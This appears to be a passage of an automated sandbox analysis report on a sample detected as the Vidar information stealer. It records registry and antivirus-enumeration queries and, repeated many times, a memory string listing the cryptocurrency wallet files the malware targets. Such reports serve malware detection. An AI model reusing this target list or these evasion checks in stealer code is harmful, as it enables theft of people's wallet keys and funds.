Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.4315570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.4315570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5832, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
